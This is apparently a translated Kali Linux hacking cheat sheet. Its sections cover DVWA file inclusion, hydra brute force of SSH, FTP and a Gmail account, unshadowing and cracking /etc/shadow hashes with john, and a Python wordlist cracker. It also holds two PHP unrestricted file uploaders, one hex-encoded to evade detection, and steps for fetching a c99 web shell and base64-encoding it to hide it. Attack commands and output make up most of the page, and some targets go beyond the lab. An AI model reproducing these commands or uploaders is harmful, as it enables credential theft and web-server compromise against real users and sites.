 http://192.168.2.193/dvwa/setup.php 

 User: admin 

 Pass: password 











Enter the server (Kali) IP in the browser and click the "Submit" button
-----------------------------

File Inclusion

http://192.168.2.193/dvwa/vulnerabilities/fi/?page=include.php

http://192.168.2.193/dvwa/vulnerabilities/fi/?page=/etc/passwd

12 - Cracking passwords with "hydra"


In the Kali 2.0 terminal, type the commands below:


 nmap -sS -sC -sV 192.168.2.193 

Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-12 01:07 EDT
Nmap scan report for 192.168.2.193
Host is up (0.0000020s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10 (protocol 2.0)
| ssh-hostkey:
|   2048 7d:a9:70:d3:55:c8:cc:6e:c4:ca:c9:c0:0b:bd:3a:a3 (RSA)
|_  256 dc:c1:af:2d:fc:d4:a6:6a:49:5e:4d:b8:d2:9a:d1:19 (ECDSA)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel




Example 1

 hydra -l jura -P passlist.txt 192.168.2.193 ssh -v -V 

Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-05-12 01:01:33
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 6 tasks per 1 server, overall 64 tasks, 6 login tries (l:1/p:6), ~0 tries per task
[DATA] attacking service ssh on port 22
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://192.168.2.193:22
[INFO] Successful, password authentication is supported by ssh://192.168.2.193:22
[ATTEMPT] target 192.168.2.193 - login "jura" - pass "123" - 1 of 6 [child 0] (0/0)
[ATTEMPT] target 192.168.2.193 - login "jura" - pass "jura" - 2 of 6 [child 1] (0/0)
[ATTEMPT] target 192.168.2.193 - login "jura" - pass "eu" - 3 of 6 [child 2] (0/0)
[ATTEMPT] target 192.168.2.193 - login "jura" - pass "pizza" - 4 of 6 [child 3] (0/0)
[ATTEMPT] target 192.168.2.193 - login "jura" - pass "test" - 5 of 6 [child 4] (0/0)
[ATTEMPT] target 192.168.2.193 - login "jura" - pass "teste" - 6 of 6 [child 5] (0/0)
[22][ssh] host: 192.168.2.193   login: jura   password: 123
[STATUS] attack finished for 192.168.2.193 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-05-12 01:01:35



The run above used a small password file; create it like this:

cat > passlist.txt

123
jura
eu
pizza
test
teste
admin
winner

Ctrl+D ( save and exit )



Example 2

 hydra 192.168.2.13 ftp -s 50000 -L /root/users.txt -P /root/passlist.txt 

Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-05-12 02:01:01
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 16 tasks per 1 server, overall 64 tasks, 42 login tries (l:7/p:6), ~0 tries per task
[DATA] attacking service ftp on port 50000
[50000][ftp] host: 192.168.2.13   login: ewb1   password: 123
[50000][ftp] host: 192.168.2.13   login: ftp1   password: 123
1 of 1 target successfully completed, 2 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-05-12 02:01:16


Creating a users file.

cat > users.txt

root
admin
administrator
ewb
ewb1
ftp
ftp1

Ctrl+D ( save and exit )



cat > passlist.txt

123
jura
eu
pizza
test
teste

Ctrl+D ( save and exit )


Another option is the password dictionary that ships with Kali -> rockyou


In the Kali terminal, locate the file.

 locate *rockyou* 


Decompress it.

 gunzip /usr/share/wordlists/rockyou.txt.gz 



Move the file to the root directory.

 mv /usr/share/wordlists/rockyou.txt /root/rockyou.txt 



List the file.

 ls -lh 

-rw-r--r-- 1 root root 134M Mar  3  2013 rockyou.txt



Or download a wordlist collection


mkdir -p /usr/share/wordlists/

git clone https://github.com/danielmiessler/SecLists/ /usr/share/wordlists/

( git clone refuses a non-empty target directory; on a Kali install that already has /usr/share/wordlists/rockyou.txt.gz, clone into an empty directory and adjust the paths below )

cd /usr/share/wordlists/Passwords/Leaked-Databases/

tar -xvzf rockyou-withcount.txt.tar.gz

tar -xvzf rockyou.txt.tar.gz

ls -lhS rock*

 1 jura jura 243M Sep 23  2015 rockyou-withcount.txt

 1 jura jura 134M Sep 23  2015 rockyou.txt
-rw-r--r-- 1 root root  54M Nov 30 15:20 rockyou-withcount.txt.tar.gz
-rw-r--r-- 1 root root  51M Nov 30 15:20 rockyou.txt.tar.gz
-rw-r--r-- 1 root root 468K Nov 30 15:20 rockyou-75.txt
-rw-r--r-- 1 root root 337K Nov 30 15:20 rockyou-70.txt
-rw-r--r-- 1 root root 239K Nov 30 15:20 rockyou-65.txt
-rw-r--r-- 1 root root 167K Nov 30 15:20 rockyou-60.txt
-rw-r--r-- 1 root root 113K Nov 30 15:20 rockyou-55.txt
-rw-r--r-- 1 root root  75K Nov 30 15:20 rockyou-50.txt
-rw-r--r-- 1 root root  48K Nov 30 15:20 rockyou-45.txt
-rw-r--r-- 1 root root  31K Nov 30 15:20 rockyou-40.txt
-rw-r--r-- 1 root root  20K Nov 30 15:20 rockyou-35.txt
-rw-r--r-- 1 root root  12K Nov 30 15:20 rockyou-30.txt
-rw-r--r-- 1 root root 7.1K Nov 30 15:20 rockyou-25.txt
-rw-r--r-- 1 root root 4.0K Nov 30 15:20 rockyou-20.txt
-rw-r--r-- 1 root root 1.9K Nov 30 15:20 rockyou-15.txt
-rw-r--r-- 1 root root  723 Nov 30 15:20 rockyou-10.txt
-rw-r--r-- 1 root root  104 Nov 30 15:20 rockyou-05.txt

rm *.tar.gz

du -sch /usr/share/wordlists/Passwords/

282M	/usr/share/wordlists/Passwords/
282M	total

hydra -l jura -P /usr/share/wordlists/Passwords/Leaked-Databases/rockyou-withcount.txt 192.168.10.108 -t 4 ssh

hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.1.105 -t 4 -e nsr ssh

hydra -l root -P /usr/share/wordlists/Passwords/Leaked-Databases/rockyou-withcount.txt 192.168.1.105 -t 4 -e nsr ssh

( -P takes a file, -p a single password; -e nsr additionally tries an empty password, the login itself and the login reversed; rockyou-withcount.txt prefixes every line with its occurrence count, so for hydra use plain rockyou.txt )


Using the dictionary.

 hydra 192.168.2.13 ftp -s 50000 -L /root/users.txt -P /root/rockyou.txt 




Example 3

 hydra -l root -P passlist.txt 192.168.2.13 ssh 

Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-05-12 02:11:45
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 6 tasks per 1 server, overall 64 tasks, 6 login tries (l:1/p:6), ~0 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.2.13   login: root   password: 123
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-05-12 02:11:58




Example 4


Brute force against a Google mail account (SMTP over TLS on port 465).


 hydra -S -l emailx@gmail.com -P /usr/share/wordlists/nmap.lst -e ns -V -s 465 smtp.gmail.com smtp 


 hydra -S -l 2helpmeout@gmail.com -P /root/rockyou.txt -e ns -V -s 465 smtp.gmail.com smtp 


 hydra -t 5 -V -f -l jura -P passlist.txt localhost ssh 


 hydra -t 5 -V -f -l root -e ns -P passlist.txt localhost mysql 


13 - Cracking passwords with john the ripper


In the Kali 2.0 terminal, type the commands below ( unshadow takes the passwd file first, then the shadow file ):

 unshadow /etc/passwd /etc/shadow > mypasswd.txt  


 cat mypasswd.txt 

root:$6$MH8TLS/Q$C3Vtt7RaOIcWXLcnva71/RPoj9TJ6g42xgCG0HqpJMPrkIAAKSLKjo2MRNgu3/wPiIaXg/PFB9w9gPq/mQhXC.:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:*:2:2:bin:/bin:/usr/sbin/nologin
sys:*:3:3:sys:/dev:/usr/sbin/nologin
sync:*:4:65534:sync:/bin:/bin/sync
games:*:5:60:games:/usr/games:/usr/sbin/nologin
man:*:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:*:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:*:8:8:mail:/var/mail:/usr/sbin/nologin
news:*:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:*:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:*:13:13:proxy:/bin:/usr/sbin/nologin
www-data:*:33:33:www-data:/var/www:/usr/sbin/nologin
backup:*:34:34:backup:/var/backups:/usr/sbin/nologin
list:*:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:*:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:*:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:*:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:*:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:*:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:*:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:*:104:65534::/nonexistent:/bin/false
mysql:!:105:109:MySQL Server,,,:/nonexistent:/bin/false
epmd:*:106:110::/var/run/epmd:/bin/false
Debian-exim:!:107:111::/var/spool/exim4:/bin/false
uuidd:*:108:113::/run/uuidd:/bin/false
rwhod:*:109:65534::/var/spool/rwho:/bin/false
iodine:*:110:65534::/var/run/iodine:/bin/false
miredo:*:111:65534::/var/run/miredo:/bin/false
ntp:*:112:114::/home/ntp:/bin/false
stunnel4:!:113:116::/var/run/stunnel4:/bin/false
redsocks:!:114:117::/var/run/redsocks:/bin/false
rtkit:*:115:118:RealtimeKit,,,:/proc:/bin/false
postgres:*:116:119:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
dnsmasq:*:117:65534:dnsmasq,,,:/var/lib/misc:/bin/false
messagebus:*:118:120::/var/run/dbus:/bin/false
arpwatch:!:119:122:ARP Watcher,,,:/var/lib/arpwatch:/bin/sh
usbmux:*:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
sslh:!:122:126::/nonexistent:/bin/false
geoclue:*:123:128::/var/lib/geoclue:/bin/false
couchdb:*:124:129:CouchDB Administrator,,,:/var/lib/couchdb:/bin/bash
avahi:*:125:131:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
sshd:*:126:65534::/var/run/sshd:/usr/sbin/nologin
colord:*:127:132:colord colour management daemon,,,:/var/lib/colord:/bin/false
saned:*:128:134::/var/lib/saned:/bin/false
speech-dispatcher:!:129:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
pulse:*:130:135:PulseAudio daemon,,,:/var/run/pulse:/bin/false
king-phisher:*:131:137::/var/lib/king-phisher:/bin/false
Debian-gdm:*:132:139:Gnome Display Manager:/var/lib/gdm3:/bin/false
dradis:*:133:140::/var/lib/dradis:/bin/false
beef-xss:*:134:141::/var/lib/beef-xss:/bin/false
jura:$6$Kxd.KdHp$VioUe6iuTfhFLUp0cC.2LcN5pQ0wqdQ44YPL.3fefmvY2IyVA2yCAGgui/.IouHIX2CuR873KeKXJsMNaWI7v/:1000:1000:,,,:/home/jura:/bin/bash
privoxy:*:121:65534::/etc/privoxy:/bin/false
debian-tor:*:135:125::/var/lib/tor:/bin/false
Debian-snmp:!:136:142::/var/lib/snmp:/bin/false


 /usr/sbin/john --wordlist=passlist.txt --rules mypasswd.txt 

Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 SSE2 2x])
Press 'q' or Ctrl-C to abort, almost any other key for status
123              (root)
123              (jura)
2g 0:00:00:00 DONE (2017-05-12 02:33) 6.666g/s 213.3p/s 426.6c/s 426.6C/s 123..jura4
Use the "--show" option to display all of the cracked passwords reliably
Session completed


 /usr/sbin/john --show mypasswd.txt 

root:123:0:0:root:/root:/bin/bash
jura:123:1000:1000:,,,:/home/jura:/bin/bash

2 password hashes cracked, 0 left

14 - HashKiller


"Decrypting" weak passwords: MD5 is a hash, not encryption, so sites like this
one do not decrypt anything; they answer from huge precomputed tables of hash -> word.

The longer the password and the more character classes it mixes, the less
likely it is to be in such a table.


http://www.hashkiller.co.uk/md5-decrypter.aspx


Site for looking up hashes / passwords ( the example below is md5("123") ):

202cb962ac59075b964b07152d234b70
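The attack that hydra's -e nsr (section 12), john's --rules (section 13) and the HashKiller lookup (section 14) all build on is a wordlist plus mangling, so here it is written out once, as an added example that is not part of the original page and not the code of any of those tools. It uses the page's own passlist.txt words and unsalted MD5; the mangling rules are a simplified selection chosen for this example, not john's real rule set, and the target hashes other than the page's 202cb962ac59075b964b07152d234b70 are constructed with hashlib.

```python
"""Added example: the wordlist attack behind hydra -e nsr (section 12),
john --rules (section 13) and the HashKiller lookup (section 14), written
out against unsalted MD5. Target hashes are constructed with hashlib."""
import hashlib

# The page's own passlist.txt
WORDLIST = ["123", "jura", "eu", "pizza", "test", "teste", "admin", "winner"]


def hydra_e_nsr(login):
    """What hydra adds with -e nsr: n = empty password, s = the login
    itself, r = the login reversed."""
    return ["", login, login[::-1]]


def mangle(word):
    """A few mangling rules in the spirit of john --rules (a simplified
    selection written for this example, not john's actual rule set)."""
    for base in (word, word.capitalize(), word.upper(), word[::-1]):
        yield base
        for digit in "0123456789":
            yield base + digit
        yield base + "123"
        yield base + "!"


def candidates(wordlist, login=None):
    """Every candidate in the order it would be tried, without repeats."""
    seen = set()
    base_words = list(wordlist) + (hydra_e_nsr(login) if login else [])
    for word in base_words:
        for cand in mangle(word):
            if cand not in seen:
                seen.add(cand)
                yield cand


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


def crack_md5(target_hex, wordlist, login=None):
    """Return the word whose MD5 matches, or None. Unsalted MD5 is why a
    web site can answer from a precomputed table: every MD5 of '123' is
    the same 202cb962ac59075b964b07152d234b70, for every user, forever.
    The sha512crypt ($6$) hashes from /etc/shadow above are salted and
    deliberately slow, which is what john spends its time on."""
    target_hex = target_hex.lower()
    for cand in candidates(wordlist, login):
        if md5_hex(cand) == target_hex:
            return cand
    return None


# Constructed targets (computed here, not taken from any real system)
TARGETS = {
    "hashkiller": "202cb962ac59075b964b07152d234b70",  # the page's example
    "rule_hit": md5_hex("Pizza1"),        # only reachable through a rule
    "login_rev": md5_hex("aruj"),         # 'jura' reversed (-e r)
    "strong": md5_hex("Tr0ub4dor&3"),     # not reachable from this list
}


def crack_all(targets=TARGETS, login="jura"):
    """Crack every target with the page's wordlist and the login 'jura'."""
    return {name: crack_md5(h, WORDLIST, login) for name, h in targets.items()}


if __name__ == "__main__":
    for name, plain in crack_all().items():
        print(name, "->", plain)
```

Run it and the "strong" entry stays None: that is the whole argument for length and character mix in the paragraph above, and for salted, slow hashes on the server side.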







14 - Uploaders


Uploader 1

<?php
// Minimal file uploader (the page's "uploader 1"): writes the uploaded file
// next to this script under the client-supplied name. No validation at all,
// by design; never leave this on a server you do not own.
echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( isset($_POST['_upl']) && $_POST['_upl'] == "Upload" ) {
    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
    else { echo '<b>Upload FAILED !!!</b><br><br>'; }
}
?>

Uploader 2

<html>
<body><?php if(!empty($_FILES["file"]["name"])){move_uploaded_file($_FILES["file"]["tmp_name"],$_FILES["file"]["name"]);}?>
<form action="#" method="post" enctype="multipart/form-data"><label for="file">Filename:</label><input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="Submit"></form></body>
</html>

( the open tag needs a space after <?php; written as "<?phpif(" PHP does not recognise the tag and prints the source as HTML )


Uploader 3 - hex-encoded ( uploader 2 as a single hex string )

0x3c68746d6c3e3c626f64793e3c3f7068702069662821656d70747928245f46494c45535b2266696c65225d
5b226e616d65225d29297b6d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d
5b22746d705f6e616d65225d2c245f46494c45535b2266696c65225d5b226e616d65225d293b7d3f3e
3c666f726d20616374696f6e3d222322206d6574686f643d22706f73742220656e63747970653d226d756c7469706172742f666f726d2d64617461223e
3c6c6162656c20666f723d2266696c65223e46696c656e616d653a3c2f6c6162656c3e
3c696e70757420747970653d2266696c6522206e616d653d2266696c65222069643d2266696c65223e3c62723e
3c696e70757420747970653d227375626d697422206e616d653d227375626d6974222076616c75653d225375626d6974223e3c2f666f726d3e3c2f626f64793e3c2f68746d6c3e

15 - dirb


 dirb http://www.site.com.br 

16 - Nikto


 nikto -h www.site.com.br -p 80,88,443 

17 - Uniscan


 uniscan -u http://site.com.br/ -qd 

18 - Compiling C


Compiling exploit in Kali

 gcc -m32 -o output32 hello.c  ( 32 bit)

 gcc -m64 -o output hello.c    ( 64 bit)


More information.

http://www.tutorialspoint.com/cplusplus/
http://www.cprogramming.com/tutorial/lesson1.html
http://www3.ntu.edu.sg/home/ehchua/programming/cpp/cp1_Basics.html

Creating a simple C file.

 cat > hi.c 

#include <stdio.h>

/* Prints a greeting. The original also called system("color 09") and
   getch(), which are Windows/conio.h only and do not build on Kali;
   its goto loop printed the line forever, so that was dropped too. */
int main(void)
{
    printf("Hello Friend, how are you?\n");
    return 0;
}


Compiling.

 gcc hi.c -o hello2 

( gcc already marks the output executable; chmod is not needed )


Running.

 ./hello2 

19 - Running Perl


 
 cat > hello.pl 

#!/usr/bin/perl
use strict;
use warnings;

print "Enter your name: ";
my $name = <STDIN>;   # read one line from standard input
chomp($name);         # strip the trailing newline
print "Hello, ${name} ... you will soon be a Perl addict!\n";

Running

 perl hello.pl 

20 - Running Python




Example 1

 cat > p1.py 

#!/usr/bin/env python3
print("Hello World!")
print("This is fun.")

Running.

 python3 p1.py 



Example 2

 cat > p2.py  

#!/usr/bin/env python3
name = input('What is your name?\n')   # raw_input() on Python 2
print('Hi, %s.' % name)

Running.

 python3 p2.py 


21 - Shell Base64 Encoding



http://www.localroot.net/

or

http://www.r57.gen.tr/

Choose the c99 shell



Paste it into the site below and click "encode"; the result is one very long base64 string.

http://www.freeformatter.com/base64-encoder.html


Base64 is an encoding, not encryption: anyone who finds the file can decode it, so it only hides the shell from a casual look or a naive string match. The output starts like this:

LyoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKi
oqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKi8NCi8qDQovKiAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAjICAgICMgICAgICAgICMgICAgIyAgICAgICAgICAgICAgICAgICAgICAgIC
AgICAgDQovKiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjICAgIyAgICAgICAgICAjICAg
Iw0KLyogICAgICAgI
:
:

Create the file "shell1.php" and paste the base64 code into it.

 nano shell1.php 



22 - zip, rar, tar, tar.gz, bz2, tar.bz2


Extracting archives

zip     	: unzip     filename.zip         ( gunzip handles .gz only, not .zip )

rar     	: unrar x   filename.rar

tar     	: tar -xvf  filename.tar

tar.gz      : tar -xvzf filename.tar.gz

bz2     	: bunzip2   filename.bz2

tar.bz2     : tar -xvjf filename.tar.bz2

23 - 10 minute e-mail


http://10minutemail.com/10MinuteMail/index.html




24 - Encryt x Decrypt Text


( Interactive form on the original page: a password of up to 5 characters, the text to encode, and the encoded / decoded result. Not reproduced here. )



"Wisdom is like a river, the deeper it is the less noise it makes"

Want to learn more? Contact me: linux1.noip@gmail.com